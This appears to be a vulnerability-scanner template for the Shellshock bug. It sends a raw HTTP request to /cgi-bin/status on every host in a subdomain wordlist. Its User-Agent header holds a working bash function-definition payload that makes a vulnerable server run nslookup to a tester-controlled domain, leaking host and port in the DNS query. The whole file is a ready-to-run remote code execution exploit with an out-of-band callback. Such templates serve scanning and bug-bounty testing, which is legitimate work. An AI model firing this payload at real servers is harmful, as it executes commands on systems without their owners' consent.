id: Shellshock-RCE-1

info:
  name: Shellshock RCE
  author: 0xAwali
  severity: critical
  description: Shellshock RCE Through CGI Path , Commonly Bound Ports 8500 - 8501
  reference:
      - https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/#shellshock
      - https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4
      
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /cgi-bin/status HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ;  nslookup {{Host}}.{{Port}}.{{Subdomains}}.shellshock.{{MY-DOMAIN}}
        Accept: */*
        Accept-Encoding: gzip, deflate